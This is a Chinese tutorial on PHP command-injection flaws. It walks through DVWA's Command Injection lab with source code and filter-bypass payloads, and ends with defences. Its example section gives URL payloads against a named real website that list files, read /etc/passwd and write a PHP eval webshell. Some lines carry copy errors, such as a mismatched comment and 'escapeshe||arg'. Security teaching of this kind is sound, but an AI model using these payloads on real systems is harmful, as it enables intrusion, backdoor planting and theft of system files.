命令执行漏洞原理和测试

PHP：system、exec、shell_exec、passthru、popen、proc_popen等称为高危漏洞。

原理：只要程序可以调用系统命令的情况下都可以发生命令执行漏洞。

条件：用户能够控制函数输入，存在可以执行代码的危险函数。

命令执行漏洞产生原因：

开发人员没有对特殊函数入口做过滤，导致用户可以提交恶意代码并提交服务端执行。

Web服务器没有过滤危险函数导致命令执行漏洞攻击成功。

 

命令执行漏洞带来的危害：

1. 继承Web服务程序的权限去执行系统命令或读写文件。
2. 反弹shell
3. 控制整个网站甚至控制服务器。
4. 进一步内网渗透

 

PHP中的危险函数：

1. system：成功则返回命令输出的最后一行，失败则返回FALSE。
2. exec：命令执行结果的最后一行内容。
3. shell_exec：命令执行的输出。如果执行过程中发生错误或者进程不产生输出，则返回NULL。
4. passthru：执行外部程序并且显示原始输出。
5. eval：将输入的字符串参数当做PHP程序代码来执行。
6. assert
7. preg_replace
8. call_user_func

 system(args) 有回显

passthru(args)(有回显)

exec(args) （回显最后一行-必须echo输出）

shell_exec(args) （无回显-必须输出）

反引号：``

popen(handle,mode)(无回显)

proc_open(‘cmd’,‘flag’,‘flag’)（无回显）

$process = proc_open(‘dir’,$des,$pipes);

echo stream_get_contents($pipes[1]);

DVWA：Command Injection（命令行注入）

命令连接符：

在windows和linux都支持，如果程序没有进行过滤，那么我们可以通过连接符来执行多条命令。

command1 && command2   先执行Command 1，执行成功后执行Command 2，否则不执行Command 2
command1 | command2     只执行command2

||、如果前面执行的语句执行出错，则执行后面的语句，前面的语句只能为假。例如：ping2!!whoami

command1 & command2   先执行Command 1，不管是否成功，都会执行Command 2

低：

源码：

1. <?php
2.  
3. if( isset( $_POST[ 'Submit' ]  ) ) {
4.     // Get input
5.     $target = $_REQUEST[ 'ip' ];
6.  
7.     // Determine OS and execute the ping command.
8.     if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
9.         // Windows
10.         $cmd = shell_exec( 'ping  ' . $target );
11.     }
12.     else {
13.         // *nix
14.         $cmd = shell_exec( 'ping  -c 4 ' . $target );
15.     }
16.  
17.     // Feedback for the end user
18.     echo "<pre>{$cmd}</pre>";
19. }
20.  
21. ?>

strustr：搜索字符串在另一字符串中的第一次出现，返回字符串的剩余部分。

php_uname：返回运行PHP操作系统的相关描述。s：返回操作系统名称。n：返回主机名。r：返回版本名。

服务器通过判断操作系统执行不同ping命令，但是对ip参数并未做任何的过滤，导致了严重的命令注入漏洞。

由于windows和linux都可以用&&来执行多条命令，所以可以构造payload：127.0.0.1&&net user

 

中：

中等级使用的是str_replace把‘&&’，‘;’替换为空字符串，所以可以构造payload：127.0.0.1 &;&whoami。

高：

1. <?php
2.  
3. if( isset( $_POST[ 'Submit' ]  ) ) {
4.     // Get input
5.     $target = trim($_REQUEST[ 'ip' ]);
6.  
7.     // Set blacklist
8.     $substitutions = array(  #黑名单过滤
9.         '&'  => '',
10.         ';'  => '',
11.         '| ' => '',
12.         '-'  => '',
13.         '$'  => '',
14.         '('  => '',
15.         ')'  => '',
16.         '`'  => '',
17.         '||' => '',
18.     );
19.  
20.     // Remove any of the charactars in the array (blacklist).
21.     $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
22.  
23.     // Determine OS and execute the ping command.
24.     if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
25.         // Windows
26.         $cmd = shell_exec( 'ping  ' . $target );
27.     }
28.     else {
29.         // *nix
30.         $cmd = shell_exec( 'ping  -c 4 ' . $target );
31.     }
32.  
33.     // Feedback for the end user
34.     echo "<pre>{$cmd}</pre>";
35. }
36.  
37. ?>

相比于前面两个等级的，高等级完善了黑名单，但是由于黑名单的局限性，我们可以看出来他只是过滤掉了“| ”，如果|后不跟空格则可以绕过过滤。可以构造payload：127.0.0.1|dir

 

 

命令执行漏洞实例：

读取当前目录文件：

http://ztsj.ztgame.com/stat.php?url=%27%26ls+%26%27       #url=’&ls&’

查看etc目录：

http://ztsj.ztgame.com/stat.php?url=%27%26ls+/etc+%26%27   #url='&ls /etc &'

读取系统密码：

http://ztsj.ztgame.com/stat.php?url=%27%26cat+/etc/passwd+%26%27   # url='&echo "<?php @eval(\$_POST['value']);?>" >> php.php &'

写入一句话木马：

http://ztsj.ztgame.com/stat.php?url=%27%26echo+"<?php @eval(\$_POST['value']);?>"+>>+php.php+%26%27

#url='&echo "<?php @eval(\$_POST['value']);?>" >> php.php &'

 

命令执行的防御：

1. 尽量不要执行外部命令。
2. 使用自定义函数或者函数库来代替外部命令的功能。
3. 使用escapeshe||arg函数来处理命令参数。
4. 使用safe_mode_exec_dir指定可执行文件的路径。（safe_mode_exec_dir指定路径时可以把会使用的命令提前放入此路径内。）

• 能使用脚本解决的工作，不要调用其他程序处理，尽量少用执行命令的函数，并在disabl_functions中禁用。
• 在进入命令执行的函数或方法之前，对参数进行过滤。
• 参数的值尽量使用引号包裹，并在拼接前调用addslashes进行转义。